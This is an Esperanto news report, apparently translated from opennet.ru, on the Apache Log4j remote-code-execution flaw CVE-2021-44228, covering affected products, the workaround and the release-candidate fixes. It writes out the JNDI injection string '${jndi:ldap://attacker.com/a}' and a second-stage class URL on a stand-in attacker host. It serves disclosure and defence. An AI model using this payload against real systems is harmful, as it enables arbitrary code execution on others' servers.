En Apache Log4j, populara kadro por organizi ensalutadon en Java-aplikoj, kritika vundebleco estis identigita, kiu permesas al arbitra kodo esti efektivigita kiam speciale formatita valoro en la formato "{jndi:URL}" estas skribita al la protokolo. La atako povas esti farita sur Java-aplikoj, kiuj registras valorojn ricevitajn de eksteraj fontoj, ekzemple, kiam oni montras problemajn valorojn en erarmesaĝoj.
Oni rimarkas, ke preskaŭ ĉiuj projektoj uzantaj kadrojn kiel Apache Struts, Apache Solr, Apache Druid aŭ Apache Flink estas tuŝitaj de la problemo, inkluzive de Steam, Apple iCloud, Minecraft klientoj kaj serviloj. Oni atendas, ke la vundebleco povus konduki al ondo de amasaj atakoj kontraŭ kompaniaj aplikoj, ripetante la historion de kritikaj vundeblecoj en la kadro Apache Struts, kiu, laŭ malglata takso, estas uzata en retejoj de 65% de Fortune. 100 kompanioj.Inkluzive de provoj skani la reton por vundeblaj sistemoj.
La problemo estas pligravigita de la fakto, ke funkcianta ekspluato jam estis publikigita, sed korektoj por la stabilaj branĉoj ankoraŭ ne estis kompilitaj. La CVE-identigilo ankoraŭ ne estis asignita. La riparo estas nur inkluzivita en la testbranĉo log4j-2.15.0-rc1. Kiel solvo por bloki la vundeblecon, oni rekomendas agordi la parametron log4j2.formatMsgNoLookups al vera.
La problemo estis kaŭzita de la fakto ke log4j subtenas prilaboradon de specialaj maskoj "{}" en linioj eligo al la protokolo, en kiuj JNDI (Java Nomado kaj Dosierujo-Interfaco) povus esti ekzekutitaj. La atako resumas al pasi ŝnuron kun la anstataŭigo "${jndi:ldap://attacker.com/a}", dum prilaborado, kiu log4j sendos LDAP-peton por la vojo al la Java klaso al la atakanto.com-servilo. . La vojo resendita de la servilo de la atakanto (ekzemple, http://second-stage.attacker.com/Exploit.class) estos ŝarĝita kaj ekzekutita en la kunteksto de la nuna procezo, kio permesas al la atakanto ekzekuti arbitran kodon sur la sistemo kun la rajtoj de la nuna aplikaĵo.
Aldono 1: La vundebleco ricevis la identigilon CVE-2021-44228.
Aldono 2: Rimedo preteriri la protekton aldonitan per eldono log4j-2.15.0-rc1 estis identigita. Nova ĝisdatigo, log4j-2.15.0-rc2, estis proponita kun pli kompleta protekto kontraŭ la vundebleco. La kodo elstarigas la ŝanĝon asociitan kun la foresto de nenormala fino en la kazo de uzado de malĝuste formatita JNDI-URL.
fonto: opennet.ru